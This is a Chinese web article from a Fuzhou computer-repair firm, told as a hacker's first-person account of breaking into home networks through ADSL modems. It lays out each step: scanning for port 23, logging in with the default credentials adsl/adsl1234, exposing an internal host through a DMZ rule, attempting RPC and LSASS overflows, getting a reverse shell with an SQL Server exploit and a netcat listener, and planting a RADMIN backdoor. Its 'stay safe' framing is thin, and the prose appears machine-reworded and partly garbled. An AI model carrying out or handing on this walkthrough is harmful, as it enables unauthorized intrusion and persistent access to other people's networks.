看我如何入侵ADSL加以防范安全
这是一位所谓的"黑客"的口述,你没关系看一下,大概你看完后对他的技能性做法不是完全明确,但是你一定会感到一身冷汗,因为我们现在使用ADSL曾经日益广泛,但我们的安全意识还不是很强.听完他的口述希望各人在日后能增强安全防备!
口述:
大概看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已讨厌,近来我对ADSL MODEM的路由功能产生了浓重的兴味,颠末一番高兴,我终于找到了穿透ADSL路由入侵内网的方法,在这里和列位一同分享我的心得。
一.扫描
现在很多ADSL MODEM都是经过 80 23 21 三个端口来办理,但80 21端口有很多办事器都有打开,没怎么特性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我地点地区的IP段,(跨多几段都没关系,横竖SUPPERSCAN的速度便是快)眨眼间,结果出来了,开23的主机还真不少啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登岸对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一样平常是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我便是上帝。
二.映射
入侵曾经成功了一半,要进一步入侵内网,我们要举行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了推测。一样平常来说,MODEM的内网IP缺省是192.168.1.1,而大少数就把本身主机的IP设成192.168.1.2。因此我们只需试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是192.168.1.2到底开放了什么端口,我们基础就不知道啊,呵呵,既然不知道,那么我就把他整台主机通明地映射到外网,详细做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2,到此192.168.1.2曾经通明地映射到192.168.1.1上了,我们访问ADSL MODEM就等于访问主机192.168.1.2了
三.检测
现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx举行扫描,呵,看到没有?扫描结果曾经差别了,开放的端口是139 1433等,刚才只是开放了80 23 21 罢了(也便是说我们的映射曾经成功了)该是X-SCAN脱手了,用它来扫弱口令最好不过了,但扫描的结果令人扫兴,一个弱口令也没有,看来管理员还不算低B啊。
四.溢出
既然没有弱口令,也没开80,那只好从溢出方面动手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我领导了RPC溢出,但理论证明RPC溢出也是不行的,LSASS溢出也不行 。
五.募然回顾,那人却在,灯火衰退处
看来这办理员照旧比较卖力的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?)心动不如行动,现在只好去世马当活马医了,于是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。
六.设置后门
到这里,我们的入侵曾经成功了,余下的是扫尾留后门,至于后门,我一样平常都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,信赖列位都知道。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|